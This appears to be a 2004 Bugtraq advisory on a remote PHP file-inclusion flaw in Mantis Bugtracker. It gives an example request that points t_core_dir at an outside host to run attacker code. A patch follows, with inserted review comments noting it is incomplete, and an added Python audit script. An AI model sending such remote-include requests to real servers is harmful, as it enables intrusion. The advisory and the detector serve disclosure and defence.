
Bugtraq mailing list archives

Mantis Bugtracker Remote PHP Code Execution Vulnerability
From: Jose Antonio <joxeankoret () yahoo es>
Date: 20 Aug 2004 23:05:41 -0000



--------------------------------------------------------------------------- 
     Mantis Bugtracker Remote PHP Code Execution Vulnerability
--------------------------------------------------------------------------- 
 
Author: Joxean Koret 
Date: 08-01-2004 
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
 
Mantis Bugtracker 
 
Mantis is a web-based bugtracking system. It is written in the PHP scripting
language and requires the MySQL database and a webserver.
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Remote PHP Code Execution Vulnerability 
 
A1. If PHP's register_globals setting is enabled, an attacker can execute
arbitrary PHP code by overwriting the global variable $t_core_dir with a URL
of their choosing (for example
http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/)

 The following files are vulnerable:

 bug_api.php -> at line 22? (using variable $t_core_path)
 relationship_api.php -> Line 14 (using variable $t_core_dir)
 
The fix: 
~~~~~~~~ 
 
Both of these issues have now been fixed in CVS.

There is also a patch for the Mantis 0.19.0a version.
 
===================================================================== 
mantis.patch 
 
bug_api.php 
 @@ -19,7 +19,7 @@ 
      require_once( $t_core_dir . 
'sponsorship_api.php' ); 
   
      # MASC RELATIONSHIP 
 - 
require_once( $t_core_path.'relationship_api.php' ); 
 + 
require_once( $t_core_dir.'relationship_api.php' ); 
      # MASC RELATIONSHIP 
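Review bot: the renamed require_once on the `+` line now depends on $t_core_dir, but nothing in the visible context shows bug_api.php assigning that variable itself, and the advisory's own example request targets bug_api.php with t_core_dir in the query string. If the file only inherits $t_core_dir from whatever includes it, a direct request with register_globals on still controls the include path, including the unchanged `require_once( $t_core_dir . 'sponsorship_api.php' );` context line. Please confirm that an assignment such as `$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;` precedes line 19 of this file, or add one here as the relationship_api.php change does.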
  
 and to relationship API: 
      ### Relationship API ### 
   
 + $t_core_dir = 
dirname( __FILE__ ).DIRECTORY_SEPARATOR; 
 + 
      require_once( $t_core_dir . 
'collapse_api.php' ); 
   
      # MASC RELATIONSHIP  
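Review bot: the added `$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;` has no comment saying it is there to stop a request-supplied value reaching the require_once below when register_globals is on. Without one it looks redundant next to an includer that already uses $t_core_dir and could be dropped in a later cleanup, so a one-line comment above the assignment would help. This part of the patch also has no file header or `@@` line, so it cannot be applied as posted; the "and to relationship API:" line should become a proper relationship_api.php header.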
 
===================================================================== 
--------------------------------------------------------------------------- 
Contact: 
~~~~~~~~ 
 
        Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es 
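
An audit check for the bug class described under "Vulnerabilities" above, as an added example that is not part of the original advisory or of Mantis: it flags every include/require whose leading path variable is never assigned earlier in the same file. The PHP samples are constructed from the patch context, the function and constant names are hypothetical, and the line-by-line matching assumes one statement per line.

```python
import re

# include/require whose path starts with a variable,
# e.g. require_once( $t_core_dir . 'x.php' );
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)")
# Statement-level assignment, e.g. $t_core_dir = dirname( __FILE__ )...;
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=[^=]")
COMMENT_RE = re.compile(r"^\s*(#|//|\*|/\*)")

def find_unanchored_includes(php_source):
    """Return (line_no, variable, statement) for each include/require whose
    leading path variable was not assigned earlier in the same file. With
    register_globals on, such a variable can be set from the request."""
    assigned = set()
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        if COMMENT_RE.match(line):
            continue
        m = ASSIGN_RE.match(line)
        if m:
            assigned.add(m.group(1))
            continue
        m = INCLUDE_RE.search(line)
        if m and m.group(1) not in assigned:
            findings.append((line_no, m.group(1), line.strip()))
    return findings

# Constructed samples modelled on the patch context (not the real Mantis files).
BEFORE_FIX = """<?php
### Relationship API ###

require_once( $t_core_dir . 'collapse_api.php' );
"""
AFTER_FIX = """<?php
### Relationship API ###

$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;

require_once( $t_core_dir . 'collapse_api.php' );
"""
# Assumption: the including file sets $t_core_dir itself but uses $t_core_path.
BUG_API_BEFORE = """<?php
$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;
require_once( $t_core_dir . 'sponsorship_api.php' );
# MASC RELATIONSHIP
require_once( $t_core_path.'relationship_api.php' );
"""
```
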
 
 
 

